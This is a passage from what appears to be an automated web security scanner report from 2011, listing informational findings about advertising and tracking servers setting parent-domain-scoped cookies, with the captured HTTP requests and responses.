The following cookies were issued by the application and are scoped to a parent of the issuing domain (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /K08784/b3/0/3/1008211/203785884.js?D=DM_LOC%3Dhttp%253A%252F%252Ftechflash.com%252F%253Fpid%253DACBJ%2526_rsiL%253D0%26DM_EOM%3D1&C=K08784 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://techflash.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e205ae3&9&10024,10124,10066,10080,10076,10085,10133,10143,10152&4dfac4be&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_D05509=82f4957c1a652091&D05509&0&4e22104b&0&&4dfc450c&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J07717=82f4957c1a652091&J07717&0&4e2422d0&0&&4dfea8b0&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e256477&1&10002&4dfeaccb&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A08721=82f4957c1a652091&A08721&0&4e282d57&0&&4e02b17f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e2e16fd&3&10055,10194,10534&4e07f4c5&1f1a384c105a2f365a2b2d6af5f27c36; rsi_segs_1000000=pUP94z+huXIMH/C1v6FY5BD9CU6duy5U1bkTIGbg2kQ6O500fvSx4UTo+UUZb5s27MU/gF1/ux7sGskdcPE/6idJLlUd7AAuXxxKy8BUcq3cPyLWWekcccnlFzHzZkpIVGfqfRixeJKIBCGYBys6pp34bnWBjoi4hWw0DEv8dZ1MKmhKcNVsgETg9Nxm9eUl2bYV4lz3F2qKGE4AQLEr2EpApywjvzC6ooxJGX2EpUDKZlDNGVCwlbwye561cEN0B95VelQaph/AIlLefSqhn5oCS/k/ffgQkvaHKwO3Hq2Jzt8Egb1MjdZhZUG2cS4+A/q9YkInuHps6t/FPHBFw5HhQo4/Cnazuco89WTgh/dG0NX2NzX9OHtWRemoBuTHV9Uzk58uZ3qvc/CWxOl0LVo6Mubh94RiFrR2pY2eUGuzMIfxqu1g5tF34x6XqpYBxymEeg7y5u6rHubC+TdBqemh88ANgsz6DyIi8PlIddeOxKdS38ycSBeL7ivCg9OcwKHelps5XFngUJ3CsZmV1D8+myaR+JjiRqTsZ5lwsaSdrB1ttygPM0cJVYaoJtMmveKTqltFKrTirU5KmpF8YBVx81cnIA2P6JaVmf2NK10qC7myMOpZ9M0P7sDNtMtyhoW8vaHg+DQsVRT4OB3V/8sMk/tMnEbNnGx1TV0N3YMAdxJkT99c4I4VazVkf7e8/iyP8wGSmzPUsD5yKdOMe1AeGm4f8IRVXN+eZ/iJtioCfSYznCj/ZRVHpQ8GtMbVwmql1/CQzDUY; rtc_Vpu9=...[SNIP]...; rsiPus_TE1N="...[SNIP]..."; rsi_us_1000000="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"; udm_0=...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_Vpu9=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_v0Na=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_SA26=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_iydh=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=...[SNIP]...; Domain=.revsci.net; Expires=Thu, 05-Jul-2012 14:01:08 GMT; Path=/
Set-Cookie: rtc_vsLf=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; Domain=.revsci.net; Expires=Thu, 05-Jul-2012 14:01:08 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 173
Date: Wed, 06 Jul 2011 14:01:08 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = ['K08784_10001'];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable(['K08784_10001'],'k08784');}

9.29. http://pix04.revsci.net/K08784/b3/0/3/1008211/223509117.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /K08784/b3/0/3/1008211/223509117.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /K08784/b3/0/3/1008211/223509117.js?D=DM_LOC%3Dhttp%253A%252F%252Ftechflash.com%252Fabout.html%253Fpid%253DACBJ%2526_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Ftechflash.com%252F%26DM_EOM%3D1&C=K08784 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://techflash.com/about.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e205ae3&9&10024,10124,10066,10080,10076,10085,10133,10143,10152&4dfac4be&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_D05509=82f4957c1a652091&D05509&0&4e22104b&0&&4dfc450c&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J07717=82f4957c1a652091&J07717&0&4e2422d0&0&&4dfea8b0&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e256477&1&10002&4dfeaccb&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A08721=82f4957c1a652091&A08721&0&4e282d57&0&&4e02b17f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e2e16fd&3&10055,10194,10534&4e07f4c5&1f1a384c105a2f365a2b2d6af5f27c36; rsiPus_feb9="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"; rsi_us_1000000="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"; NETSEGS_K08784=82f4957c1a652091&K08784&0&4e39547c&0&&4e140790&1f1a384c105a2f365a2b2d6af5f27c36; rtc_v0Na=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; 
rsi_segs_1000000=pUPF4jOheXIMH/C1v6FY5BD9CU6du67BSgvgzGDKayViGy3JIntSYSCogy2dpq+vTNY9h2lFiAhEBsltMJbTJ9ivq7PTxfNWHGNAsDuCMaDOsTL2zPjGJ+CmLyT1fIx2UEmQqSaRlxwJf87lS0DSpS34ET1l5eDtMmmNUq38ritDzt0qMIT37KJxcr4I926kXGcBv1f+PlRy1YRo+0j9e1w838xgs4qtMuHJ90XLG6RbwlkrvkToOceVQTaOiUZU/rxSy5Qu6HXjzsXVOVmNAWWASVamxCEkN1L6ihWFC8ws5XARoRY9wzIAMfg9/1loHEfe1+HXBkwmZBbpcxg51RGTU74BDldjx2+dF0Ma8d2aV97JgPzw21QEGFaJMpQxIa8qF7TyvyiIDfGdeKQGuAQ/OTDCJg4o2QVFNzKdUEvgGjAOEysGaiRP3qVv7QVIJoh+/u0LWksU4W2M2y8ypXUrK0K3ItRF/Iczv8l1mcBHEcZNvPgAHmNJ29T7pHeeR8oFKTQNfPyQmLW2aaz3YNVElfNa5z9QG4akMouVMFXDD0rhvkqtZ8sYH5/H7N49fKrdemzWSUrYrcbYHCQv+GTQOTlvJ3I7uggVSAxHoD70bb3St51P9Dxv6oXHekK5/IYIf28uwGtRcld8yrPBrHAg34wtHGRhvpl6dHoJZo/vbbsKtSnDL3Zz19C1wHWlV8uTdIjd90gL5yoZRDt6LeZpFQudSu0zSwA9IvWVADSBfsZ6S0NDSfgYUcFw8jp9Tl70PII=; rtc_SA26=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; udm_0=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_v0Na=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_SA26=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Vpu9=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_iydh=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=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; Domain=.revsci.net; Expires=Thu, 05-Jul-2012 14:01:44 GMT; Path=/
Set-Cookie: rtc_N0S3=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; Domain=.revsci.net; Expires=Thu, 05-Jul-2012 14:01:44 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 173
Date: Wed, 06 Jul 2011 14:01:44 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = ['K08784_10001'];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable(['K08784_10001'],'k08784');}

9.30. http://pixel.quantserve.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=1794506331;fpan=0;fpa=P0-399196261-1309960828609;ns=0;url=http%3A%2F%2Ftechflash.com%2Fabout.html;ref=http%3A%2F%2Ftechflash.com%2F;ce=1;je=1;sr=1920x1200x32;enc=n;ogl=;dst=1;et=1309960851219;tzo=300;a=p-b1m9DYkJHhIgg HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://techflash.com/about.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4dcd4b82-3e074-feeab-8b152; d=EE0ACvaeApllAacBAZQHgdUOHqk9Hk4aHCkZKMSWr4EAiBAAlgpgDm8r4gzhXR4Q0Q4Q0dpKRrgSiBD3DhEJHRDlTzDRuzCl4UAwUA5j0l8z0U4QD9MOnyphDaT33F5Q

Response

HTTP/1.1 302 Found
Connection: close
Location: http://www.burstnet.com/enlightn/7111//82F1/
Set-Cookie: d=EFkACvaeApllAawBAZQHgdUOHqk9Hk4aHCkZKMSWr4EAiBAAlgpgDm8r4gzhXR4Q0Q4Q0ZkuW5Kxa4EogQ9w4RCR0Q5U8w0bswpeFAMFAOY9JfM9FOEA_TDp8qYQ2k99xeU; expires=Tue, 04-Oct-2011 14:00:51 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Wed, 06 Jul 2011 14:00:51 GMT
Server: QS


9.31. http://pixel.quantserve.com/pixel/p-5eu58oSpL1cEs.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel/p-5eu58oSpL1cEs.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel/p-5eu58oSpL1cEs.gif?labels=_fp.channel.Beauty+of+the+Web,_fp.event.All+Content HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://www.beautyoftheweb.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4dcd4b82-3e074-feeab-8b152; d=EFkACvaeApllAawBAZQHgdUOHqk9Hk4aHCkZKMSWr4EAiBAAlgpgDm8r4gzhXR4Q0Q4Q0ZkuW5Kxa4EogQ9w4RCR0Q5U8w0bswpeFAMFAOY9JfM9FOEA_TDp8qYQ2k99xeU

Response

HTTP/1.1 200 OK
Connection: close
